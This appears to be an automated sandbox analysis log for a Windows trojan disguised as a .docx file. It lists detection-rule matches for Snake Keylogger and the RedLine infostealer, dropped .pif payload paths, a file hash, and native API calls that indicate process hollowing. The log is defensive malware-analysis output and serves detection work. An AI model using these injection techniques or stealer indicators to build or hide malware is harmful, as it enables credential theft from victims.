          Source: 0000000D.00000002.3468030849.00000000308EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
          Source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
          Source: Process Memory Space: xzeheenC.pif PID: 6656, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: Process Memory Space: xzeheenC.pif PID: 6656, type: MEMORYSTR, Matched rule: Detects Snake Keylogger, Author: ditekSHen
          Source: Process Memory Space: xzeheenC.pif PID: 432, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: Process Memory Space: xzeheenC.pif PID: 432, type: MEMORYSTR, Matched rule: Detects Snake Keylogger, Author: ditekSHen
          Source: Process Memory Space: xzeheenC.pif PID: 2140, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: Process Memory Space: xzeheenC.pif PID: 2140, type: MEMORYSTR, Matched rule: Detects Snake Keylogger, Author: ditekSHen
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, Code function: 0_2_029D8254 NtReadVirtualMemory,0_2_029D8254
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, Code function: 0_2_029D84C4 NtUnmapViewOfSection,0_2_029D84C4
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, Code function: 0_2_029DDACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,0_2_029DDACC
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, Code function: 0_2_029DDA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,0_2_029DDA44
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, Code function: 0_2_029DDBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_029DDBB0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, Code function: 0_2_029D8BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_029D8BB0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, Code function: 0_2_029D79B4 NtAllocateVirtualMemory,0_2_029D79B4
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, Code function: 0_2_029D7D00 NtWriteVirtualMemory,0_2_029D7D00
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, Code function: 0_2_029D8BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_029D8BAE
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, Code function: 0_2_029D79B2 NtAllocateVirtualMemory,0_2_029D79B2
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, Code function: 0_2_029DD9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,0_2_029DD9F0
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 6_2_02958254 NtReadVirtualMemory,6_2_02958254
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 6_2_029584C4 NtUnmapViewOfSection,6_2_029584C4
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 6_2_0295DACC NtCreateFile,NtWriteFile,NtClose,6_2_0295DACC
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 6_2_0295DA44 NtDeleteFile,6_2_0295DA44
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 6_2_02958BB0 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,6_2_02958BB0
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 6_2_0295DBB0 NtOpenFile,NtReadFile,NtClose,6_2_0295DBB0
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 6_2_029579B4 NtAllocateVirtualMemory,6_2_029579B4
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 6_2_02957D00 NtWriteVirtualMemory,6_2_02957D00
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 6_2_02958BAE Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,6_2_02958BAE
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 6_2_029579B2 NtAllocateVirtualMemory,6_2_029579B2
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 6_2_0295D9F0 NtDeleteFile,6_2_0295D9F0
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 10_2_02AE8254 NtReadVirtualMemory,10_2_02AE8254
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 10_2_02AE84C4 NtUnmapViewOfSection,10_2_02AE84C4
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 10_2_02AEDACC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,10_2_02AEDACC
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 10_2_02AEDA44 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,10_2_02AEDA44
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 10_2_02AE8BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,10_2_02AE8BB0
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 10_2_02AEDBB0 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,10_2_02AEDBB0
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 10_2_02AE79B4 NtAllocateVirtualMemory,10_2_02AE79B4
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 10_2_02AE7D00 NtWriteVirtualMemory,10_2_02AE7D00
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 10_2_02AE8BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,10_2_02AE8BAE
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 10_2_02AE79B2 NtAllocateVirtualMemory,10_2_02AE79B2
          Source: C:\Users\Public\Libraries\Cneehezx.PIF, Code function: 10_2_02AED9F0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,10_2_02AED9F0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, Code function: 0_2_029D85DC CreateProcessAsUserW,0_2_029D85DC
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_0040DC114_1_0040DC11
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_00407C3F4_1_00407C3F
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_00418CCC4_1_00418CCC
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_00406CA04_1_00406CA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_004028B04_1_004028B0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_0041A4BE4_1_0041A4BE
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_004182444_1_00418244
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_004016504_1_00401650
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_00402F204_1_00402F20
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_004193C44_1_004193C4
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_004187884_1_00418788
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_00402F894_1_00402F89
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_00402B904_1_00402B90
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_1_004073A04_1_004073A0
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_029420C46_2_029420C4
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 6_2_0294D59B6_2_0294D59B
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00408C609_2_00408C60
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_0040DC119_2_0040DC11
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00407C3F9_2_00407C3F
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00418CCC9_2_00418CCC
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00406CA09_2_00406CA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_004028B09_2_004028B0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_0041A4BE9_2_0041A4BE
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_004182449_2_00418244
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_004016509_2_00401650
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00402F209_2_00402F20
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_004193C49_2_004193C4
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_004187889_2_00418788
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00402F899_2_00402F89
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_00402B909_2_00402B90
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_004073A09_2_004073A0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_340F15B19_2_340F15B1
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_340F15C09_2_340F15C0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_340F13119_2_340F1311
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_340F13209_2_340F1320
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_371EE6609_2_371EE660
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_371E7C989_2_371E7C98
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_371E0A509_2_371E0A50
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_371E0A609_2_371E0A60
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_371EC0F09_2_371EC0F0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2DBA09_2_37E2DBA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2A7989_2_37E2A798
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2B3289_2_37E2B328
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2E7309_2_37E2E730
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2F2C09_2_37E2F2C0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2BEB89_2_37E2BEB8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2CA489_2_37E2CA48
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E206089_2_37E20608
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2A1D09_2_37E2A1D0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2D5D89_2_37E2D5D8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2AD609_2_37E2AD60
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2E1689_2_37E2E168
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E271389_2_37E27138
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2B8F09_2_37E2B8F0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2ECF89_2_37E2ECF8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2C4809_2_37E2C480
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2F8889_2_37E2F888
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E200409_2_37E20040
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E22C089_2_37E22C08
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2D0109_2_37E2D010
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E267809_2_37E26780
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E267719_2_37E26771
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E205FD9_2_37E205FD
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2D5C89_2_37E2D5C8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E2D0019_2_37E2D001
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E499E89_2_37E499E8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E493F89_2_37E493F8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E40BD09_2_37E40BD0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E49FB89_2_37E49FB8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4A5809_2_37E4A580
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E411989_2_37E41198
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E417609_2_37E41760
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4D9709_2_37E4D970
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4E7409_2_37E4E740
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4AB489_2_37E4AB48
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E471209_2_37E47120
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E41D289_2_37E41D28
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4F5109_2_37E4F510
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4B1109_2_37E4B110
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E477109_2_37E47710
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E47CD89_2_37E47CD8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4B6D89_2_37E4B6D8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4BCA09_2_37E4BCA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E482A09_2_37E482A0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E462B09_2_37E462B0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E454809_2_37E45480
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4D2809_2_37E4D280
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E488689_2_37E48868
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4C2689_2_37E4C268
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E400409_2_37E40040
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4E0589_2_37E4E058
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4EE289_2_37E4EE28
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E48E309_2_37E48E30
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E406089_2_37E40608
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4D9619_2_37E4D961
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4E7309_2_37E4E730
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4AB399_2_37E4AB39
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4F5019_2_37E4F501
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E477029_2_37E47702
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4D2719_2_37E4D271
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4E0489_2_37E4E048
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E450209_2_37E45020
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E400069_2_37E40006
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E450109_2_37E45010
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4EE189_2_37E4EE18
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_380499649_2_38049964
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_38041DD89_2_38041DD8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_380414F89_2_380414F8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_38040E109_2_38040E10
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_380400409_2_38040040
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_380407289_2_38040728
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_38047CF09_2_38047CF0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_38047CF89_2_38047CF8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_380414E89_2_380414E8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_38040E009_2_38040E00
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_3804A1309_2_3804A130
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_3804A15B9_2_3804A15B
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_380407189_2_38040718
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_3813A9009_2_3813A900
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_3813B7B89_2_3813B7B8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_381341D09_2_381341D0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00408C609_1_00408C60
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_0040DC119_1_0040DC11
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00407C3F9_1_00407C3F
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00418CCC9_1_00418CCC
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00406CA09_1_00406CA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_004028B09_1_004028B0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_0041A4BE9_1_0041A4BE
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_004182449_1_00418244
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_004016509_1_00401650
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00402F209_1_00402F20
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_004193C49_1_004193C4
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_004187889_1_00418788
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00402F899_1_00402F89
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00402B909_1_00402B90
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_004073A09_1_004073A0
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 10_2_02AD20C410_2_02AD20C4
          Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\xzeheenC.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227120369.00000000218D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227120369.0000000021905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2278122938.0000000021A1C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020820000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.000000002089B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: 4.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 13.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 13.2.xzeheenC.pif.31d76478.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.31d76478.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1d270f08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1d270f08.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.3092b98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.3092b98e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1e32e790.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1e32e790.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.31dae790.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.31dae790.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.3092c896.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.3092c896.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.370d0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.370d0000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 6.2.Cneehezx.PIF.21496c78.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
